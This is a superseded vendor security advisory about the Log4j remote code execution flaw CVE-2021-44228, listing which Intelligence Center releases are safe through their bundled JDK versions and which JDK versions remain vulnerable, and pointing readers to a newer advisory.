EIQ-2021-0016

ID

EIQ-2021-0016

CVE

CVE-2021-44228

Description

Superseded by EIQ-2021-0016-2.

Log4j versions earlier than 2.15 have a remote code execution vulnerability.

Date

10 December 2021

Updated 14 December 2021

Severity

See EIQ-2021-0016-2

CVSSv3 score

10.0

Status

See EIQ-2021-0016-2

Assessment

11 December 2021: Superseded by EIQ-2021-0016-2.

Mitigations described here are no longer relevant.

This is a developing situation. For updated advice, see EIQ-2021-0016-2.

Log4j versions earlier than 2.15 are vulnerable to CVE-2021-44228 where log formatting can be exploited to retrieve arbitrary data from a malicious LDAP server through JDNI (Java Naming and Directory Interface), and can result in remote code execution.

This exploit is mitigated in versions of the Intelligence Center listed below, by bundling versions of the JDK that block the exploit:

Intelligence Center release

Status

Bundled JDK

2.11.0

Safe

1.8.0_312-b07

2.10.3

Safe

1.8.0_312-b07

2.10.2

Safe

1.8.0_302-b08

2.10.1

Safe

1.8.0_302-b08

2.10.0

Safe

1.8.0_292-b10

2.9.3

Safe

1.8.0_282-b08

2.9.2

Safe

1.8.0_282-b08

2.9.1

Safe

1.8.0_282-b08

2.9.0

Safe

1.8.0_275-b01

Your system is still vulnerable if it runs these versions of JDK (Java Development Kit):

  • 6u211 and earlier

  • 7u201 and earlier

  • 8u191 and earlier

  • 11.0.1 and earlier

More information:

Mitigation

-

Affected versions

2.11.x – 2.9.x

Notes

N/A